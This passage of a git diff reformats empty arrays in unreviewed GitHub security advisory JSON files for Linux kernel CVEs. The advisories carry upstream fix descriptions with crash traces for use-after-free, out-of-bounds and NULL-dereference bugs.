(i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1 04/01/2014\n [ 92.046785] Call Trace:\n [ 92.047171] ? __bpf_prog_run_args64+0xc0/0xc0\n [ 92.047773] ? __bpf_prog_run_args32+0x8b/0xb0\n [ 92.048389] ? __bpf_prog_run_args64+0xc0/0xc0\n [ 92.049019] ? ktime_get+0x117/0x130\n [...] // few hundred [similar] lines more\n [ 92.659025] ? ktime_get+0x117/0x130\n [ 92.659845] ? __bpf_prog_run_args64+0xc0/0xc0\n [ 92.660738] ? __bpf_prog_run_args32+0x8b/0xb0\n [ 92.661528] ? __bpf_prog_run_args64+0xc0/0xc0\n [ 92.662378] ? print_usage_bug+0x50/0x50\n [ 92.663221] ? print_usage_bug+0x50/0x50\n [ 92.664077] ? bpf_ksym_find+0x9c/0xe0\n [ 92.664887] ? ktime_get+0x117/0x130\n [ 92.665624] ? kernel_text_address+0xf5/0x100\n [ 92.666529] ? __kernel_text_address+0xe/0x30\n [ 92.667725] ? unwind_get_return_address+0x2f/0x50\n [ 92.668854] ? ___bpf_prog_run+0x15d4/0x2e20\n [ 92.670185] ? ktime_get+0x117/0x130\n [ 92.671130] ? __bpf_prog_run_args64+0xc0/0xc0\n [ 92.672020] ? __bpf_prog_run_args32+0x8b/0xb0\n [ 92.672860] ? __bpf_prog_run_args64+0xc0/0xc0\n [ 92.675159] ? ktime_get+0x117/0x130\n [ 92.677074] ? lock_is_held_type+0xd5/0x130\n [ 92.678662] ? ___bpf_prog_run+0x15d4/0x2e20\n [ 92.680046] ? ktime_get+0x117/0x130\n [ 92.681285] ? __bpf_prog_run32+0x6b/0x90\n [ 92.682601] ? __bpf_prog_run64+0x90/0x90\n [ 92.683636] ? lock_downgrade+0x370/0x370\n [ 92.684647] ? mark_held_locks+0x44/0x90\n [ 92.685652] ? ktime_get+0x117/0x130\n [ 92.686752] ? lockdep_hardirqs_on+0x79/0x100\n [ 92.688004] ? ktime_get+0x117/0x130\n [ 92.688573] ? __cant_migrate+0x2b/0x80\n [ 92.689192] ? bpf_test_run+0x2f4/0x510\n [ 92.689869] ? bpf_test_timer_continue+0x1c0/0x1c0\n [ 92.690856] ? rcu_read_lock_bh_held+0x90/0x90\n [ 92.691506] ? __kasan_slab_alloc+0x61/0x80\n [ 92.692128] ? eth_type_trans+0x128/0x240\n [ 92.692737] ? __build_skb+0x46/0x50\n [ 92.693252] ? bpf_prog_test_run_skb+0x65e/0xc50\n [ 92.693954] ? bpf_prog_test_run_raw_tp+0x2d0/0x2d0\n [ 92.694639] ? __fget_light+0xa1/0x100\n [ 92.695162] ? bpf_prog_inc+0x23/0x30\n [ 92.695685] ? __sys_bpf+0xb40/0x2c80\n [ 92.696324] ? bpf_link_get_from_fd+0x90/0x90\n [ 92.697150] ? mark_held_locks+0x24/0x90\n [ 92.698007] ? lockdep_hardirqs_on_prepare+0x124/0x220\n [ 92.699045] ? finish_task_switch+0xe6/0x370\n [ 92.700072] ? lockdep_hardirqs_on+0x79/0x100\n [ 92.701233] ? finish_task_switch+0x11d/0x370\n [ 92.702264] ? __switch_to+0x2c0/0x740\n [ 92.703148] ? mark_held_locks+0x24/0x90\n [ 92.704155] ? __x64_sys_bpf+0x45/0x50\n [ 92.705146] ? do_syscall_64+0x35/0x80\n [ 92.706953] ? entry_SYSCALL_64_after_hwframe+0x44/0xae\n [...]\n\nTurns out that the program rejection from e411901c0b77 (\"bpf: allow for tailcalls\nin BPF subprograms for x64 JIT\") is buggy since env->prog->aux->tail_call_reachable\nis never true. Commit ebf7d1f508a7 (\"bpf, x64: rework pro/epilogue and tailcall\nhandling in JIT\") added a tracker into check_max_stack_depth() which propagates\nthe tail_call_reachable condition throughout the subprograms. This info is then\nassigned to the subprogram's \n---truncated---", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-w825-9xqr-f6q3/GHSA-w825-9xqr-f6q3.json b/advisories/unreviewed/2024/05/GHSA-w825-9xqr-f6q3/GHSA-w825-9xqr-f6q3.json index b22b5e348c3..ce27a8bcdeb 100644 --- a/advisories/unreviewed/2024/05/GHSA-w825-9xqr-f6q3/GHSA-w825-9xqr-f6q3.json +++ b/advisories/unreviewed/2024/05/GHSA-w825-9xqr-f6q3/GHSA-w825-9xqr-f6q3.json @@ -7,12 +7,8 @@ "CVE-2021-47303" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Track subprog poke descriptors correctly and fix use-after-free\n\nSubprograms are calling map_poke_track(), but on program release there is no\nhook to call map_poke_untrack(). However, on program release, the aux memory\n(and poke descriptor table) is freed even though we still have a reference to\nit in the element list of the map aux data. When we run map_poke_run(), we then\nend up accessing free'd memory, triggering KASAN in prog_array_map_poke_run():\n\n [...]\n [ 402.824689] BUG: KASAN: use-after-free in prog_array_map_poke_run+0xc2/0x34e\n [ 402.824698] Read of size 4 at addr ffff8881905a7940 by task hubble-fgs/4337\n [ 402.824705] CPU: 1 PID: 4337 Comm: hubble-fgs Tainted: G I 5.12.0+ #399\n [ 402.824715] Call Trace:\n [ 402.824719] dump_stack+0x93/0xc2\n [ 402.824727] print_address_description.constprop.0+0x1a/0x140\n [ 402.824736] ? prog_array_map_poke_run+0xc2/0x34e\n [ 402.824740] ? prog_array_map_poke_run+0xc2/0x34e\n [ 402.824744] kasan_report.cold+0x7c/0xd8\n [ 402.824752] ? prog_array_map_poke_run+0xc2/0x34e\n [ 402.824757] prog_array_map_poke_run+0xc2/0x34e\n [ 402.824765] bpf_fd_array_map_update_elem+0x124/0x1a0\n [...]\n\nThe elements concerned are walked as follows:\n\n for (i = 0; i < elem->aux->size_poke_tab; i++) {\n poke = &elem->aux->poke_tab[i];\n [...]\n\nThe access to size_poke_tab is a 4 byte read, verified by checking offsets\nin the KASAN dump:\n\n [ 402.825004] The buggy address belongs to the object at ffff8881905a7800\n which belongs to the cache kmalloc-1k of size 1024\n [ 402.825008] The buggy address is located 320 bytes inside of\n 1024-byte region [ffff8881905a7800, ffff8881905a7c00)\n\nThe pahole output of bpf_prog_aux:\n\n struct bpf_prog_aux {\n [...]\n /* --- cacheline 5 boundary (320 bytes) --- */\n u32 size_poke_tab; /* 320 4 */\n [...]\n\nIn general, subprograms do not necessarily manage their own data structures.\nFor example, BTF func_info and linfo are just pointers to the main program\nstructure. This allows reference counting and cleanup to be done on the latter\nwhich simplifies their management a bit. The aux->poke_tab struct, however,\ndid not follow this logic. The initial proposed fix for this use-after-free\nbug further embedded poke data tracking into the subprogram with proper\nreference counting. However, Daniel and Alexei questioned why we were treating\nthese objects special; I agree, its unnecessary. The fix here removes the per\nsubprogram poke table allocation and map tracking and instead simply points\nthe aux->poke_tab pointer at the main programs poke table. This way, map\ntracking is simplified to the main program and we do not need to manage them\nper subprogram.\n\nThis also means, bpf_prog_free_deferred(), which unwinds the program reference\ncounting and kfrees objects, needs to ensure that we don't try to double free\nthe poke_tab when free'ing the subprog structures. This is easily solved by\nNULL'ing the poke_tab pointer. The second detail is to ensure that per\nsubprogram JIT logic only does fixups on poke_tab[] entries it owns. To do\nthis, we add a pointer in the poke structure to point at the subprogram value\nso JITs can easily check while walking the poke_tab structure if the current\nentry belongs to the current program. The aux pointer is stable and therefore\nsuitable for such comparison. On the jit_subprogs() error path, we omit\ncleaning up the poke->aux field because these are only ever referenced from\nthe JIT side, but on error we will never make it to the JIT, so its fine to\nleave them dangling. Removing these pointers would complicate the error path\nfor no reason. However, we do need to untrack all poke descriptors from the\nmain program as otherwise they could race with the freeing of JIT memory from\nthe subprograms. Lastly, a748c6975dea3 (\"bpf: propagate poke des\n---truncated---", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-w883-jj58-rv96/GHSA-w883-jj58-rv96.json b/advisories/unreviewed/2024/05/GHSA-w883-jj58-rv96/GHSA-w883-jj58-rv96.json index 75eae120501..baf3c1c1894 100644 --- a/advisories/unreviewed/2024/05/GHSA-w883-jj58-rv96/GHSA-w883-jj58-rv96.json +++ b/advisories/unreviewed/2024/05/GHSA-w883-jj58-rv96/GHSA-w883-jj58-rv96.json @@ -7,12 +7,8 @@ "CVE-2021-47404" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: betop: fix slab-out-of-bounds Write in betop_probe\n\nSyzbot reported slab-out-of-bounds Write bug in hid-betopff driver.\nThe problem is the driver assumes the device must have an input report but\nsome malicious devices violate this assumption.\n\nSo this patch checks hid_device's input is non empty before it's been used.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-wc9c-rv2v-442r/GHSA-wc9c-rv2v-442r.json b/advisories/unreviewed/2024/05/GHSA-wc9c-rv2v-442r/GHSA-wc9c-rv2v-442r.json index 4b542053a93..c97dd4ba283 100644 --- a/advisories/unreviewed/2024/05/GHSA-wc9c-rv2v-442r/GHSA-wc9c-rv2v-442r.json +++ b/advisories/unreviewed/2024/05/GHSA-wc9c-rv2v-442r/GHSA-wc9c-rv2v-442r.json @@ -7,12 +7,8 @@ "CVE-2021-47294" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetrom: Decrease sock refcount when sock timers expire\n\nCommit 63346650c1a9 (\"netrom: switch to sock timer API\") switched to use\nsock timer API. It replaces mod_timer() by sk_reset_timer(), and\ndel_timer() by sk_stop_timer().\n\nFunction sk_reset_timer() will increase the refcount of sock if it is\ncalled on an inactive timer, hence, in case the timer expires, we need to\ndecrease the refcount ourselves in the handler, otherwise, the sock\nrefcount will be unbalanced and the sock will never be freed.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-wgwm-v825-xmjx/GHSA-wgwm-v825-xmjx.json b/advisories/unreviewed/2024/05/GHSA-wgwm-v825-xmjx/GHSA-wgwm-v825-xmjx.json index a44d04a2eb1..9bcbddc43e9 100644 --- a/advisories/unreviewed/2024/05/GHSA-wgwm-v825-xmjx/GHSA-wgwm-v825-xmjx.json +++ b/advisories/unreviewed/2024/05/GHSA-wgwm-v825-xmjx/GHSA-wgwm-v825-xmjx.json @@ -7,12 +7,8 @@ "CVE-2021-47255" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nkvm: LAPIC: Restore guard to prevent illegal APIC register access\n\nPer the SDM, \"any access that touches bytes 4 through 15 of an APIC\nregister may cause undefined behavior and must not be executed.\"\nWorse, such an access in kvm_lapic_reg_read can result in a leak of\nkernel stack contents. Prior to commit 01402cf81051 (\"kvm: LAPIC:\nwrite down valid APIC registers\"), such an access was explicitly\ndisallowed. Restore the guard that was removed in that commit.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-wr5g-85mp-25c9/GHSA-wr5g-85mp-25c9.json b/advisories/unreviewed/2024/05/GHSA-wr5g-85mp-25c9/GHSA-wr5g-85mp-25c9.json index 83887fdd121..ab65efc029e 100644 --- a/advisories/unreviewed/2024/05/GHSA-wr5g-85mp-25c9/GHSA-wr5g-85mp-25c9.json +++ b/advisories/unreviewed/2024/05/GHSA-wr5g-85mp-25c9/GHSA-wr5g-85mp-25c9.json @@ -7,12 +7,8 @@ "CVE-2021-47250" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipv4: fix memory leak in netlbl_cipsov4_add_std\n\nReported by syzkaller:\nBUG: memory leak\nunreferenced object 0xffff888105df7000 (size 64):\ncomm \"syz-executor842\", pid 360, jiffies 4294824824 (age 22.546s)\nhex dump (first 32 bytes):\n00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\nbacktrace:\n[<00000000e67ed558>] kmalloc include/linux/slab.h:590 [inline]\n[<00000000e67ed558>] kzalloc include/linux/slab.h:720 [inline]\n[<00000000e67ed558>] netlbl_cipsov4_add_std net/netlabel/netlabel_cipso_v4.c:145 [inline]\n[<00000000e67ed558>] netlbl_cipsov4_add+0x390/0x2340 net/netlabel/netlabel_cipso_v4.c:416\n[<0000000006040154>] genl_family_rcv_msg_doit.isra.0+0x20e/0x320 net/netlink/genetlink.c:739\n[<00000000204d7a1c>] genl_family_rcv_msg net/netlink/genetlink.c:783 [inline]\n[<00000000204d7a1c>] genl_rcv_msg+0x2bf/0x4f0 net/netlink/genetlink.c:800\n[<00000000c0d6a995>] netlink_rcv_skb+0x134/0x3d0 net/netlink/af_netlink.c:2504\n[<00000000d78b9d2c>] genl_rcv+0x24/0x40 net/netlink/genetlink.c:811\n[<000000009733081b>] netlink_unicast_kernel net/netlink/af_netlink.c:1314 [inline]\n[<000000009733081b>] netlink_unicast+0x4a0/0x6a0 net/netlink/af_netlink.c:1340\n[<00000000d5fd43b8>] netlink_sendmsg+0x789/0xc70 net/netlink/af_netlink.c:1929\n[<000000000a2d1e40>] sock_sendmsg_nosec net/socket.c:654 [inline]\n[<000000000a2d1e40>] sock_sendmsg+0x139/0x170 net/socket.c:674\n[<00000000321d1969>] ____sys_sendmsg+0x658/0x7d0 net/socket.c:2350\n[<00000000964e16bc>] ___sys_sendmsg+0xf8/0x170 net/socket.c:2404\n[<000000001615e288>] __sys_sendmsg+0xd3/0x190 net/socket.c:2433\n[<000000004ee8b6a5>] do_syscall_64+0x37/0x90 arch/x86/entry/common.c:47\n[<00000000171c7cee>] entry_SYSCALL_64_after_hwframe+0x44/0xae\n\nThe memory of doi_def->map.std pointing is allocated in\nnetlbl_cipsov4_add_std, but no place has freed it. It should be\nfreed in cipso_v4_doi_free which frees the cipso DOI resource.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-wxhc-3989-9jq8/GHSA-wxhc-3989-9jq8.json b/advisories/unreviewed/2024/05/GHSA-wxhc-3989-9jq8/GHSA-wxhc-3989-9jq8.json index 096f9c41957..949c5b20d17 100644 --- a/advisories/unreviewed/2024/05/GHSA-wxhc-3989-9jq8/GHSA-wxhc-3989-9jq8.json +++ b/advisories/unreviewed/2024/05/GHSA-wxhc-3989-9jq8/GHSA-wxhc-3989-9jq8.json @@ -7,12 +7,8 @@ "CVE-2021-47288" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: ngene: Fix out-of-bounds bug in ngene_command_config_free_buf()\n\nFix an 11-year old bug in ngene_command_config_free_buf() while\naddressing the following warnings caught with -Warray-bounds:\n\narch/alpha/include/asm/string.h:22:16: warning: '__builtin_memcpy' offset [12, 16] from the object at 'com' is out of the bounds of referenced subobject 'config' with type 'unsigned char' at offset 10 [-Warray-bounds]\narch/x86/include/asm/string_32.h:182:25: warning: '__builtin_memcpy' offset [12, 16] from the object at 'com' is out of the bounds of referenced subobject 'config' with type 'unsigned char' at offset 10 [-Warray-bounds]\n\nThe problem is that the original code is trying to copy 6 bytes of\ndata into a one-byte size member _config_ of the wrong structue\nFW_CONFIGURE_BUFFERS, in a single call to memcpy(). This causes a\nlegitimate compiler warning because memcpy() overruns the length\nof &com.cmd.ConfigureBuffers.config. It seems that the right\nstructure is FW_CONFIGURE_FREE_BUFFERS, instead, because it contains\n6 more members apart from the header _hdr_. Also, the name of\nthe function ngene_command_config_free_buf() suggests that the actual\nintention is to ConfigureFreeBuffers, instead of ConfigureBuffers\n(which takes place in the function ngene_command_config_buf(), above).\n\nFix this by enclosing those 6 members of struct FW_CONFIGURE_FREE_BUFFERS\ninto new struct config, and use &com.cmd.ConfigureFreeBuffers.config as\nthe destination address, instead of &com.cmd.ConfigureBuffers.config,\nwhen calling memcpy().\n\nThis also helps with the ongoing efforts to globally enable\n-Warray-bounds and get us closer to being able to tighten the\nFORTIFY_SOURCE routines on memcpy().", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-x52v-qr6m-xx85/GHSA-x52v-qr6m-xx85.json b/advisories/unreviewed/2024/05/GHSA-x52v-qr6m-xx85/GHSA-x52v-qr6m-xx85.json index 44c8f9f7173..66227a9271f 100644 --- a/advisories/unreviewed/2024/05/GHSA-x52v-qr6m-xx85/GHSA-x52v-qr6m-xx85.json +++ b/advisories/unreviewed/2024/05/GHSA-x52v-qr6m-xx85/GHSA-x52v-qr6m-xx85.json @@ -7,12 +7,8 @@ "CVE-2020-36788" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/nouveau: avoid a use-after-free when BO init fails\n\nnouveau_bo_init() is backed by ttm_bo_init() and ferries its return code\nback to the caller. On failures, ttm_bo_init() invokes the provided\ndestructor which should de-initialize and free the memory.\n\nThus, when nouveau_bo_init() returns an error the gem object has already\nbeen released and the memory freed by nouveau_bo_del_ttm().", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-x56w-x8rv-273m/GHSA-x56w-x8rv-273m.json b/advisories/unreviewed/2024/05/GHSA-x56w-x8rv-273m/GHSA-x56w-x8rv-273m.json index 5d71cd91482..ea94b840fca 100644 --- a/advisories/unreviewed/2024/05/GHSA-x56w-x8rv-273m/GHSA-x56w-x8rv-273m.json +++ b/advisories/unreviewed/2024/05/GHSA-x56w-x8rv-273m/GHSA-x56w-x8rv-273m.json @@ -7,12 +7,8 @@ "CVE-2021-47335" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix to avoid racing on fsync_entry_slab by multi filesystem instances\n\nAs syzbot reported, there is an use-after-free issue during f2fs recovery:\n\nUse-after-free write at 0xffff88823bc16040 (in kfence-#10):\n kmem_cache_destroy+0x1f/0x120 mm/slab_common.c:486\n f2fs_recover_fsync_data+0x75b0/0x8380 fs/f2fs/recovery.c:869\n f2fs_fill_super+0x9393/0xa420 fs/f2fs/super.c:3945\n mount_bdev+0x26c/0x3a0 fs/super.c:1367\n legacy_get_tree+0xea/0x180 fs/fs_context.c:592\n vfs_get_tree+0x86/0x270 fs/super.c:1497\n do_new_mount fs/namespace.c:2905 [inline]\n path_mount+0x196f/0x2be0 fs/namespace.c:3235\n do_mount fs/namespace.c:3248 [inline]\n __do_sys_mount fs/namespace.c:3456 [inline]\n __se_sys_mount+0x2f9/0x3b0 fs/namespace.c:3433\n do_syscall_64+0x3f/0xb0 arch/x86/entry/common.c:47\n entry_SYSCALL_64_after_hwframe+0x44/0xae\n\nThe root cause is multi f2fs filesystem instances can race on accessing\nglobal fsync_entry_slab pointer, result in use-after-free issue of slab\ncache, fixes to init/destroy this slab cache only once during module\ninit/destroy procedure to avoid this issue.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-xp6h-p4cj-42w8/GHSA-xp6h-p4cj-42w8.json b/advisories/unreviewed/2024/05/GHSA-xp6h-p4cj-42w8/GHSA-xp6h-p4cj-42w8.json index c2bff0616ed..14ef4388b92 100644 --- a/advisories/unreviewed/2024/05/GHSA-xp6h-p4cj-42w8/GHSA-xp6h-p4cj-42w8.json +++ b/advisories/unreviewed/2024/05/GHSA-xp6h-p4cj-42w8/GHSA-xp6h-p4cj-42w8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-xqq2-v4rf-49qr/GHSA-xqq2-v4rf-49qr.json b/advisories/unreviewed/2024/05/GHSA-xqq2-v4rf-49qr/GHSA-xqq2-v4rf-49qr.json index f01eb2ab74f..843fd456f26 100644 --- a/advisories/unreviewed/2024/05/GHSA-xqq2-v4rf-49qr/GHSA-xqq2-v4rf-49qr.json +++ b/advisories/unreviewed/2024/05/GHSA-xqq2-v4rf-49qr/GHSA-xqq2-v4rf-49qr.json @@ -7,12 +7,8 @@ "CVE-2021-47290" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: target: Fix NULL dereference on XCOPY completion\n\nCPU affinity control added with commit 39ae3edda325 (\"scsi: target: core:\nMake completion affinity configurable\") makes target_complete_cmd() queue\nwork on a CPU based on se_tpg->se_tpg_wwn->cmd_compl_affinity state.\n\nLIO's EXTENDED COPY worker is a special case in that read/write cmds are\ndispatched using the global xcopy_pt_tpg, which carries a NULL se_tpg_wwn\npointer following initialization in target_xcopy_setup_pt().\n\nThe NULL xcopy_pt_tpg->se_tpg_wwn pointer is dereferenced on completion of\nany EXTENDED COPY initiated read/write cmds. E.g using the libiscsi\nSCSI.ExtendedCopy.Simple test:\n\n BUG: kernel NULL pointer dereference, address: 00000000000001a8\n RIP: 0010:target_complete_cmd+0x9d/0x130 [target_core_mod]\n Call Trace:\n fd_execute_rw+0x148/0x42a [target_core_file]\n ? __dynamic_pr_debug+0xa7/0xe0\n ? target_check_reservation+0x5b/0x940 [target_core_mod]\n __target_execute_cmd+0x1e/0x90 [target_core_mod]\n transport_generic_new_cmd+0x17c/0x330 [target_core_mod]\n target_xcopy_issue_pt_cmd+0x9/0x60 [target_core_mod]\n target_xcopy_read_source.isra.7+0x10b/0x1b0 [target_core_mod]\n ? target_check_fua+0x40/0x40 [target_core_mod]\n ? transport_complete_task_attr+0x130/0x130 [target_core_mod]\n target_xcopy_do_work+0x61f/0xc00 [target_core_mod]\n\nThis fix makes target_complete_cmd() queue work on se_cmd->cpuid if\nse_tpg_wwn is NULL.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-xwrf-hhx9-vmhv/GHSA-xwrf-hhx9-vmhv.json b/advisories/unreviewed/2024/05/GHSA-xwrf-hhx9-vmhv/GHSA-xwrf-hhx9-vmhv.json index 2707de978f9..f592318c794 100644 --- a/advisories/unreviewed/2024/05/GHSA-xwrf-hhx9-vmhv/GHSA-xwrf-hhx9-vmhv.json +++ b/advisories/unreviewed/2024/05/GHSA-xwrf-hhx9-vmhv/GHSA-xwrf-hhx9-vmhv.json @@ -7,12 +7,8 @@ "CVE-2021-47391" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/cma: Ensure rdma_addr_cancel() happens before issuing more requests\n\nThe FSM can run in a circle allowing rdma_resolve_ip() to be called twice\non the same id_priv. While this cannot happen without going through the\nwork, it violates the invariant that the same address resolution\nbackground request cannot be active twice.\n\n CPU 1 CPU 2\n\nrdma_resolve_addr():\n RDMA_CM_IDLE -> RDMA_CM_ADDR_QUERY\n rdma_resolve_ip(addr_handler) #1\n\n\t\t\t process_one_req(): for #1\n addr_handler():\n RDMA_CM_ADDR_QUERY -> RDMA_CM_ADDR_BOUND\n mutex_unlock(&id_priv->handler_mutex);\n [.. handler still running ..]\n\nrdma_resolve_addr():\n RDMA_CM_ADDR_BOUND -> RDMA_CM_ADDR_QUERY\n rdma_resolve_ip(addr_handler)\n !! two requests are now on the req_list\n\nrdma_destroy_id():\n destroy_id_handler_unlock():\n _destroy_id():\n cma_cancel_operation():\n rdma_addr_cancel()\n\n // process_one_req() self removes it\n\t\t spin_lock_bh(&lock);\n cancel_delayed_work(&req->work);\n\t if (!list_empty(&req->list)) == true\n\n ! rdma_addr_cancel() returns after process_on_req #1 is done\n\n kfree(id_priv)\n\n\t\t\t process_one_req(): for #2\n addr_handler():\n\t mutex_lock(&id_priv->handler_mutex);\n !! Use after free on id_priv\n\nrdma_addr_cancel() expects there to be one req on the list and only\ncancels the first one. The self-removal behavior of the work only happens\nafter the handler has returned. This yields a situations where the\nreq_list can have two reqs for the same \"handle\" but rdma_addr_cancel()\nonly cancels the first one.\n\nThe second req remains active beyond rdma_destroy_id() and will\nuse-after-free id_priv once it inevitably triggers.\n\nFix this by remembering if the id_priv has called rdma_resolve_ip() and\nalways cancel before calling it again. This ensures the req_list never\ngets more than one item in it and doesn't cost anything in the normal flow\nthat never uses this strange error path.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/06/GHSA-f935-6jhc-wv29/GHSA-f935-6jhc-wv29.json b/advisories/unreviewed/2024/06/GHSA-f935-6jhc-wv29/GHSA-f935-6jhc-wv29.json index fb189532921..f197a9234e6 100644 --- a/advisories/unreviewed/2024/06/GHSA-f935-6jhc-wv29/GHSA-f935-6jhc-wv29.json +++ b/advisories/unreviewed/2024/06/GHSA-f935-6jhc-wv29/GHSA-f935-6jhc-wv29.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/07/GHSA-27h8-4rhj-pqp5/GHSA-27h8-4rhj-pqp5.json b/advisories/unreviewed/2024/07/GHSA-27h8-4rhj-pqp5/GHSA-27h8-4rhj-pqp5.json index 1fa44af0f99..9328e5ec7f5 100644 --- a/advisories/unreviewed/2024/07/GHSA-27h8-4rhj-pqp5/GHSA-27h8-4rhj-pqp5.json +++ b/advisories/unreviewed/2024/07/GHSA-27h8-4rhj-pqp5/GHSA-27h8-4rhj-pqp5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/07/GHSA-vg8h-hxwq-mx5r/GHSA-vg8h-hxwq-mx5r.json b/advisories/unreviewed/2024/07/GHSA-vg8h-hxwq-mx5r/GHSA-vg8h-hxwq-mx5r.json index c8799474222..7dc1822e782 100644 --- a/advisories/unreviewed/2024/07/GHSA-vg8h-hxwq-mx5r/GHSA-vg8h-hxwq-mx5r.json +++ b/advisories/unreviewed/2024/07/GHSA-vg8h-hxwq-mx5r/GHSA-vg8h-hxwq-mx5r.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/07/GHSA-wjx3-rm5m-37gm/GHSA-wjx3-rm5m-37gm.json b/advisories/unreviewed/2024/07/GHSA-wjx3-rm5m-37gm/GHSA-wjx3-rm5m-37gm.json index 581a4090621..5fabb5f5247 100644 --- a/advisories/unreviewed/2024/07/GHSA-wjx3-rm5m-37gm/GHSA-wjx3-rm5m-37gm.json +++ b/advisories/unreviewed/2024/07/GHSA-wjx3-rm5m-37gm/GHSA-wjx3-rm5m-37gm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-f2gw-3cqw-xmj7/GHSA-f2gw-3cqw-xmj7.json b/advisories/unreviewed/2024/08/GHSA-f2gw-3cqw-xmj7/GHSA-f2gw-3cqw-xmj7.json index 7664eab7f0c..74afc4530cf 100644 --- a/advisories/unreviewed/2024/08/GHSA-f2gw-3cqw-xmj7/GHSA-f2gw-3cqw-xmj7.json +++ b/advisories/unreviewed/2024/08/GHSA-f2gw-3cqw-xmj7/GHSA-f2gw-3cqw-xmj7.json 